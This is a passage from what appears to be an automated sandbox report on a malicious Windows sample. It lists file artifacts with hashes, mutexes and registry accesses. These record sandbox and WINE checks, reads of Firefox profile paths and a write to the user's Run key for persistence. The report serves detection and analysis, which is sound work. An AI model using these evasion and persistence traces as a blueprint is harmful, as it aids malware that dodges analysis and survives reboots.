"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "497bb917bc24b0023d281c2fc2c236af", "sha1_hash": "1c86d43980e988bfcabf57104b2101024696c184", "sha256_hash": "a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08f.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB090.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb090.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB091.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7b5b6c7bf41e6055abd4e74476e08575", "sha1_hash": "5c05d3a68f69258d236f6d9677cc0a42e399e7cc", "sha256_hash": "2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb091.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB092.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb092.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A3.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a3.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\flaB08C.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "8f44eaade8a98a128f71e04667af8328", "sha1_hash": "36ed9ceced094ab5345b34dc008176132de28716", "sha256_hash": "1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\flab08c.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A4.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a4.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A5.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a5.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A6.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a6.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\sofB0D5.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "aac3de092af58ca64dab1cc4b2186c5e", "sha1_hash": "084512759ab2be3358f3bd1c3c4ef2f88871d01f", "sha256_hash": "12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\sofb0d5.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Firefox", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla firefox", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "1142692290abc4073f6cb4f996e782fa", "sha1_hash": "d71b914d853ef1017dda3d6a0cbd29127aac5730", "sha256_hash": "6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cooB07B.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "60492a553dc3492eaea00299b9976477", "sha1_hash": "296392a97cf91096c931293099654ac50dae95f3", "sha256_hash": "8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\coob07b.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\flaB08C.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "8f44eaade8a98a128f71e04667af8328", "sha1_hash": "36ed9ceced094ab5345b34dc008176132de28716", "sha256_hash": "1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\flab08c.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08D.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "c8c975ff6c535bb9e0d34a332b334e8f", "sha1_hash": "5bcbf5c63be57bb1512270a904424352081ab0ba", "sha256_hash": "863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08d.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08E.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08e.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08F.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "497bb917bc24b0023d281c2fc2c236af", "sha1_hash": "1c86d43980e988bfcabf57104b2101024696c184", "sha256_hash": "a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08f.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB090.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb090.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB091.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7b5b6c7bf41e6055abd4e74476e08575", "sha1_hash": "5c05d3a68f69258d236f6d9677cc0a42e399e7cc", "sha256_hash": "2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb091.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB092.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb092.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A3.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a3.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A4.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a4.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A5.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a5.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB0A6.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a6.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\sofB0D5.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "aac3de092af58ca64dab1cc4b2186c5e", "sha1_hash": "084512759ab2be3358f3bd1c3c4ef2f88871d01f", "sha256_hash": "12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\sofb0d5.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Firefox", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla firefox", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\pyidom", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\pyidom", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\usontoi", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\usontoi", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [ { "mutex_name": "9B4D68961731FE3C22DA08B640799EB6", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Sandboxie_SingleInstanceMutex_Control", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Frz_State", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "E58EFF540968A436E982FCFA1C0445A2", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "C2E6ECE9938A43206F172A85684E36DB", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "CEE48AFA231AB21CA6E2437DB844BAD7", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "1F4C22565107A34AD73CB0F585F8F77C", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "20BC29E135FB9B01285187E3B5593CC8", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "ABC6B5B774FF9FD7F54EC277098C64EE", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "B3F6E53F120A5BE5825B9C06159BB3F4", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "4786CF0F1E6E9E20640CE4A22DFFC997", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "35D65C8FBCA06952705002450D6712FC", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "F063546A5853AF5508DB5A15751DB34A", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "A354992B05F4DA0EB1B4AB788E3CE988", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "61AB4C4AE08220DC5911D67B8EFCF107", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "A63A6CDA308CF3B4F10C6B82D6B9EA5B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "629BC138D148FEC80DAF76D454EF252E", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "D3F6CAB61E96B029AD170EEF2C2F89C2", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\409", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0\\win64\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses\\8804558B-B773-11d1-BC3E-0000F87552E7", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\WINE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\WINE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\GDIPlus", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\MSDAIPP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\IAM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\OneDrive", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Direct3D", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Shared", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\IMEJP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Speech", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Exchange", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Wisp", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Notepad", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SQMClient", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Keyboard", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\wfs", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SkyDrive", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Feeds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Fax", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\FTP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Kaev", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Lukuip", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Boteun", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read", "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Currentversion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Mozilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Mozilla\\Firefox", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Mozilla\\Firefox\\Crash Reporter", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Mozilla\\Firefox\\TaskBarIDs", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Firefox", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Firefox\\TaskBarIDs", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox", "type": "registry_artifact", "version": 